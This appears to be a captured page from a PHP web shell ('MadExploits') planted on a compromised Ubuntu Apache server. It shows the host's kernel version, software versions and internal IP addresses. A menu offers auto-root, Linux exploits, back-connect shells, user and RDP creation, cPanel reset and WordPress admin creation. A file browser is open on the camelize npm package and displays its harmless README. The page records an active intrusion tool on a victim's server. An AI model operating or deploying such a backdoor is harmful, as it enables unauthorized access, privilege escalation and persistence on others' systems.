Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
node_modules /
camelize /
[ HOME SHELL ]
Name
Size
Permission
Action
.github
[ DIR ]
drwxrwxr-x
example
[ DIR ]
drwxrwxr-x
test
[ DIR ]
drwxrwxr-x
.eslintrc
437
B
-rw-rw-r--
CHANGELOG.md
4
KB
-rw-rw-r--
LICENSE
1.05
KB
-rw-rw-r--
README.md
1.94
KB
-rw-rw-r--
index.js
1.35
KB
-rw-rw-r--
package.json
1.81
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README.md
# camelize <sup>[![Version Badge][npm-version-svg]][package-url]</sup> [![github actions][actions-image]][actions-url] [![coverage][codecov-image]][codecov-url] [![License][license-image]][license-url] [![Downloads][downloads-image]][downloads-url] [![npm badge][npm-badge-png]][package-url] recursively transform key strings to camel-case # example ``` js var camelize = require('camelize'); var obj = { fee_fie_foe: 'fum', beep_boop: [ { 'abc.xyz': 'mno' }, { 'foo-bar': 'baz' } ] }; var res = camelize(obj); console.log(JSON.stringify(res, null, 2)); ``` output: ``` { "feeFieFoe": "fum", "beepBoop": [ { "abcXyz": "mno" }, { "fooBar": "baz" } ] } ``` # methods ``` js var camelize = require('camelize') ``` ## camelize(obj) Convert the key strings in `obj` to camel-case recursively. # install With [npm](https://npmjs.org) do: ``` npm install camelize ``` To use in the browser, use [browserify](http://browserify.org). # license MIT [package-url]: https://npmjs.org/package/camelize [npm-version-svg]: https://versionbadg.es/ljharb/camelize.svg [deps-svg]: https://david-dm.org/ljharb/camelize.svg [deps-url]: https://david-dm.org/ljharb/camelize [dev-deps-svg]: https://david-dm.org/ljharb/camelize/dev-status.svg [dev-deps-url]: https://david-dm.org/ljharb/camelize#info=devDependencies [npm-badge-png]: https://nodei.co/npm/camelize.png?downloads=true&stars=true [license-image]: https://img.shields.io/npm/l/camelize.svg [license-url]: LICENSE [downloads-image]: https://img.shields.io/npm/dm/camelize.svg [downloads-url]: https://npm-stat.com/charts.html?package=camelize [codecov-image]: https://codecov.io/gh/ljharb/camelize/branch/main/graphs/badge.svg [codecov-url]: https://app.codecov.io/gh/ljharb/camelize/ [actions-image]: https://img.shields.io/endpoint?url=https://github-actions-badge-u3jn4tfpocch.runkit.sh/ljharb/camelize [actions-url]: https://github.com/ljharb/camelize/actions
Close